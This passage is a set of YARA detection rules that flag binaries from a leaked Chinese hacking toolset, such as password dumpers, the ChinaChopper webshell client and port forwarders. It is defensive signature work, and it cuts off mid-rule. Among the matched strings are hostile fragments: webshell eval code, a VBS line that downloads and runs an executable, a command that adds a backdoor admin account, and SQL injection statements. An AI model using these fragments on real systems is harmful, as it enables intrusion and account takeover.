|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "3f9479151c2cada04febea45c2edcf5cece1df6c"
|
||
|
id = "5688fa03-bcb0-545d-9fdf-7ab48a389424"
|
||
|
strings:
|
||
|
$s0 = "\\bin\\systemini\\MyPort.ini" wide /* PEStudio Blacklist: strings */
|
||
|
$s1 = "PortThread=200 //" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = " Port Open -> " fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 375KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_HASH_PwDump7 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file PwDump7.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "93a2d7c3a9b83371d96a575c15fe6fce6f9d50d3"
|
||
|
id = "d61a1ac3-7c8a-5de2-a5a8-2a043b73f3b3"
|
||
|
strings:
|
||
|
$s1 = "%s\\SYSTEM32\\CONFIG\\SAM" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "No Users key!" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "NO PASSWORD*********************:" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "Unable to dump file %S" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 380KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_ChinaChopper {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file ChinaChopper.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "fa347fdb23ab0b8d0560a0d20c434549d78e99b5"
|
||
|
id = "9f7fbaac-65b5-5162-87d1-96ccd9711adb"
|
||
|
strings:
|
||
|
$s1 = "$m=get_magic_quotes_gpc();$sid=$m?stripslashes($_POST[\"z1\"]):$_POST[\"z1\"];$u" wide /* PEStudio Blacklist: strings */
|
||
|
$s3 = "SETP c:\\windows\\system32\\cmd.exe " fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s4 = "Ev al (\"Exe cute(\"\"On+Error+Resume+Next:%s:Response.Write(\"\"\"\"->|\"\"\"\"" wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 2000KB and 1 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_dedecms5_7 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file dedecms5.7.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "f9cbb25883828ca266e32ff4faf62f5a9f92c5fb"
|
||
|
id = "b037862d-2821-5e96-996b-13ab241575ba"
|
||
|
strings:
|
||
|
$s1 = "/data/admin/ver.txt" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "SkinH_EL.dll" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 830KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Alien_ee {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file ee.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "15a7211154ee7aca29529bd5c2500e0d33d7f0b3"
|
||
|
id = "03540f82-6662-55e3-97f8-38776271f08b"
|
||
|
strings:
|
||
|
$s1 = "GetIIS UserName and PassWord." fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = "Read IIS ID For FreeHost." fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 50KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_smsniff_smsniff {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file smsniff.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "8667a785a8ced76d0284d225be230b5f1546f140"
|
||
|
id = "fef242d5-b274-5217-a5d1-1a6ec38d0fdd"
|
||
|
strings:
|
||
|
$s1 = "smsniff.exe" fullword wide
|
||
|
$s5 = "SmartSniff" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 267KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Happy_Happy {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Happy.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
modified = "2023-01-27"
|
||
|
score = 70
|
||
|
hash = "92067d8dad33177b5d6c853d4d0e897f2ee846b0"
|
||
|
id = "6e6c806d-e784-507f-b327-3b9f2510422b"
|
||
|
strings:
|
||
|
$s1 = "<form.*?method=\"post\"[\\s\\S]*?</form>" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = "domainscan.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s3 = "http://www.happysec.com/" wide
|
||
|
$s4 = "cmdshell" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 655KB and 2 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_T00ls_Lpk_Sethc_v3_0 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v3.0.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "fa47c4affbac01ba5606c4862fdb77233c1ef656"
|
||
|
id = "7513a513-e8a3-58a8-8dd5-512ba33ff013"
|
||
|
strings:
|
||
|
$s1 = "http://127.0.0.1/1.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = ":Rices Forum:T00Ls.Net [4 Fucker Te@m]" fullword wide
|
||
|
$s3 = "SkinH_EL.dll" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_NetFuke_NetFuke {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file NetFuke.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "f89e223fd4f6f5a3c2a2ea225660ef0957fc07ba"
|
||
|
id = "833da5c7-e562-50e9-a2a9-54c36b0d1f61"
|
||
|
strings:
|
||
|
$s1 = "Mac Flood: Flooding %dT %d p/s " fullword ascii
|
||
|
$s2 = "netfuke_%s.txt" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 1840KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_ManualInjection {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file ManualInjection.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "e83d427f44783088a84e9c231c6816c214434526"
|
||
|
id = "f0899003-824f-56ed-b653-9f7a77b9ec6a"
|
||
|
strings:
|
||
|
$s0 = "http://127.0.0.1/cookie.asp?fuck=" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s16 = "http://Www.cnhuker.com | http://www.0855.tv" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 3000KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_CnCerT_CCdoor_CMD {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "1c6ed7d817fa8e6534a5fd36a94f4fc2f066c9cd"
|
||
|
id = "ddd328a8-7ad8-5b26-9deb-3e5da801cd1b"
|
||
|
strings:
|
||
|
$s2 = "CnCerT.CCdoor.CMD.dll" fullword wide
|
||
|
$s3 = "cmdpath" fullword ascii
|
||
|
$s4 = "Get4Bytes" fullword ascii
|
||
|
$s5 = "ExcuteCmd" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 22KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_termsrvhack {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file termsrvhack.dll"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "1c456520a7b7faf71900c71167038185f5a7d312"
|
||
|
id = "4fd582a1-3c6d-57a1-bba0-f775bb61ef00"
|
||
|
strings:
|
||
|
$s1 = "The terminal server cannot issue a client license. It was unable to issue the" wide /* PEStudio Blacklist: strings */
|
||
|
$s6 = "%s\\%s\\%d\\%d" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 1052KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_IIS6_iis6 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file iis6.com"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "f0c9106d6d2eea686fd96622986b641968d0b864"
|
||
|
id = "f5d49cbd-1aec-5126-ab5d-83e485fa6869"
|
||
|
strings:
|
||
|
$s0 = "GetMod;ul" fullword ascii
|
||
|
$s1 = "excjpb" fullword ascii
|
||
|
$s2 = "LEAUT1" fullword ascii
|
||
|
$s3 = "EnumProcessModules" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 410 times */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 50KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_struts2_catbox {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file catbox.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "ee8fbd91477e056aef34fce3ade474cafa1a4304"
|
||
|
id = "24df7a11-5ec4-5e7b-86f6-6195ca01b8f9"
|
||
|
strings:
|
||
|
$s6 = "'Toolmao box by gainover www.toolmao.com" fullword ascii
|
||
|
$s20 = "{external.exeScript(_toolmao_bgscript[i],'javascript',false);}}" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 8160KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_getlsasrvaddr {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file getlsasrvaddr.exe - WCE Amplia Security"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
modified = "2022-12-21"
|
||
|
score = 70
|
||
|
hash = "a897d5da98dae8d80f3c0a0ef6a07c4b42fb89ce"
|
||
|
id = "fa0c0376-c5c3-5b48-b03e-86cefb547479"
|
||
|
strings:
|
||
|
$s8 = "pingme.txt" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s16 = ".\\lsasrv.pdb" ascii
|
||
|
$s20 = "Addresses Found: " fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 100KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_ms10048_x64 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file ms10048-x64.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0"
|
||
|
id = "b65b0bad-d74c-5e7a-a613-69ef80585c23"
|
||
|
strings:
|
||
|
$s1 = "[ ] Creating evil window" fullword ascii
|
||
|
$s2 = "[+] Set to %d exploit half succeeded" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 125KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_LogCleaner {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file LogCleaner.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "ab77ed5804b0394d58717c5f844d9c0da5a9f03e"
|
||
|
id = "63ec5e47-9f3e-547a-bbff-cac8b27ac8f7"
|
||
|
strings:
|
||
|
$s3 = ".exe <ip> [(path]" fullword ascii
|
||
|
$s4 = "LogCleaner v" ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 250KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_shell_brute_tool {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file shell_brute_tool.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "f6903a15453698c35dce841e4d09c542f9480f01"
|
||
|
id = "80fd0c9f-0ed9-5308-ac72-65b9b3b47ed1"
|
||
|
strings:
|
||
|
$s0 = "http://24hack.com/xyadmin.asp" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 1000KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_hxdef100 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file hxdef100.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "bf30ccc565ac40073b867d4c7f5c33c6bc1920d6"
|
||
|
id = "3b931752-85ae-52d0-9deb-1a1b03b39e32"
|
||
|
strings:
|
||
|
$s6 = "BACKDOORSHELL" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s15 = "%tmpdir%" fullword ascii
|
||
|
$s16 = "%cmddir%" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 200KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Arp_EMP_v1_0 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Arp EMP v1.0.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"
|
||
|
id = "03782e94-4fac-529f-b235-19cdb124d53b"
|
||
|
strings:
|
||
|
$s0 = "Arp EMP v1.0.exe" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 400KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_GetWebShell {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file GetWebShell.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "b63b53259260a7a316932c0a4b643862f65ee9f8"
|
||
|
id = "919883f4-af66-5d07-ad41-8cba3e049396"
|
||
|
strings:
|
||
|
$s0 = "echo P.Open \"GET\",\"http://www.baidu.com/ma.exe\",0 >>run.vbs" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s5 = "http://127.0.0.1/sql.asp?id=1" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s14 = "net user admin$ hack /add" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s15 = ";Drop table [hack];create table [dbo].[hack] ([cmd] [image])--" fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 70KB and 1 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Cracker_SHELL {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file SHELL.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "c1dc349ff44a45712937a8a9518170da8d4ee656"
|
||
|
id = "2249a058-7469-5054-9c51-cb20ef8197ca"
|
||
|
strings:
|
||
|
$s1 = "http://127.0.0.1/error1.asp" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "password,PASSWORD,pass,PASS,Lpass,lpass,Password" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s3 = "\\SHELL" wide /* PEStudio Blacklist: strings */
|
||
|
$s4 = "WebBrowser1" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 200KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_MSTSC_can_direct_copy {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file MSTSC_can_direct_copy.EXE"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
modified = "2022-12-21"
|
||
|
score = 70
|
||
|
hash = "2f3cbfd9f82f8abafdb1d33235fa6bfa1e1f71ae"
|
||
|
id = "9155cb6f-14b6-524a-9cb9-1a88f7facf4e"
|
||
|
strings:
|
||
|
$s1 = "srv\\newclient\\lib\\win32\\obj\\i386\\mstsc.pdb" ascii
|
||
|
$s2 = "Clear Password" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s3 = "/migrate -- migrates legacy connection files that were created with " fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 600KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_lcx_lcx {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - HTRAN - file lcx.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "0c8779849d53d0772bbaa1cedeca150c543ebf38"
|
||
|
id = "6c2e1e85-6387-5be2-b7b2-5ae8a5cca6df"
|
||
|
strings:
|
||
|
$s1 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "=========== Code by lion & bkbll" ascii
|
||
|
$s3 = "Welcome to [url]http://www.cnhonker.com[/url] " ascii
|
||
|
$s4 = "-tran <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s5 = "[+] Start Transmit (%s:%d <-> %s:%d) ......" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 30KB and 1 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_PostgreSQL {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file PostgreSQL.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "1ecfaa91aae579cfccb8b7a8607176c82ec726f4"
|
||
|
id = "ae90d03c-ef67-5ece-81ae-86947196a81c"
|
||
|
strings:
|
||
|
$s1 = "&http://192.168.16.186/details.php?id=1" fullword ascii
|
||
|
$s2 = "PostgreSQL_inject" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 2000KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_WebRobot {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file WebRobot.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "af054994c911b4301490344fca4bb19a9f394a8f"
|
||
|
id = "8b6350b6-17ea-5f44-a42a-875d55bb2de8"
|
||
|
strings:
|
||
|
$s1 = "%d-%02d-%02d %02d^%02d^%02d ScanReprot.htm" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "\\log\\ProgramDataFile.dat" ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "\\data\\FilterKeyword.txt" ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 2000KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Baidu_Extractor_Ver1_0 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Baidu_Extractor_Ver1.0.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "1899f979360e96245d31082e7e96ccedbdbe1413"
|
||
|
id = "94f3c3d8-aa68-5589-b26f-42315634ff30"
|
||
|
strings:
|
||
|
$s3 = "\\Users\\Admin" wide /* PEStudio Blacklist: strings */
|
||
|
$s11 = "soso.com" fullword wide
|
||
|
$s12 = "baidu.com" fullword wide
|
||
|
$s19 = "cmd /c ping " fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 500KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_FTP_scanning {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file FTP_scanning.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "5a3543ee5aed110c87cbc3973686e785bcb5c44e"
|
||
|
id = "828a0dc8-3748-5c07-a767-4f9e85968ca1"
|
||
|
strings:
|
||
|
$s1 = "CNotSupportedE" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "nINet.dll" fullword ascii
|
||
|
$s9 = "?=MODULE" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s13 = "MSIE 6*" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 550KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_dirdown_dirdown {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file dirdown.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
modified = "2022-12-21"
|
||
|
score = 70
|
||
|
hash = "7b8d51c72841532dded5fec7e7b0005855b8a051"
|
||
|
id = "80f98131-79bf-580d-87ad-a54a3f14b301"
|
||
|
strings:
|
||
|
$s0 = "\\Decompress\\obj\\Release\\Decompress.pdb" ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "Decompress.exe" fullword wide
|
||
|
$s5 = "Get8Bytes" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 45KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Xiaokui_conversion_tool {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Xiaokui_conversion_tool.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "dccd163e94a774b01f90c1e79f186894e2f27de3"
|
||
|
id = "26e30df6-b1d9-5d82-b368-a4a904939aa3"
|
||
|
strings:
|
||
|
$s1 = "update [dv_user] set usergroupid=1 where userid=2;--" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "To.exe" fullword wide
|
||
|
$s3 = "by zj1244" ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 240KB and 2 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_GroupPolicyRemover {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file GroupPolicyRemover.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "7475d694e189b35899a2baa462957ac3687513e5"
|
||
|
id = "e581172d-fcea-5281-ba9f-06b35c9a513e"
|
||
|
strings:
|
||
|
$s0 = "GP_killer.EXE" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s1 = "GP_killer Microsoft " fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = "SHDeleteKeyA" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 79 times */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 700KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_WordpressScanner {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file WordpressScanner.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
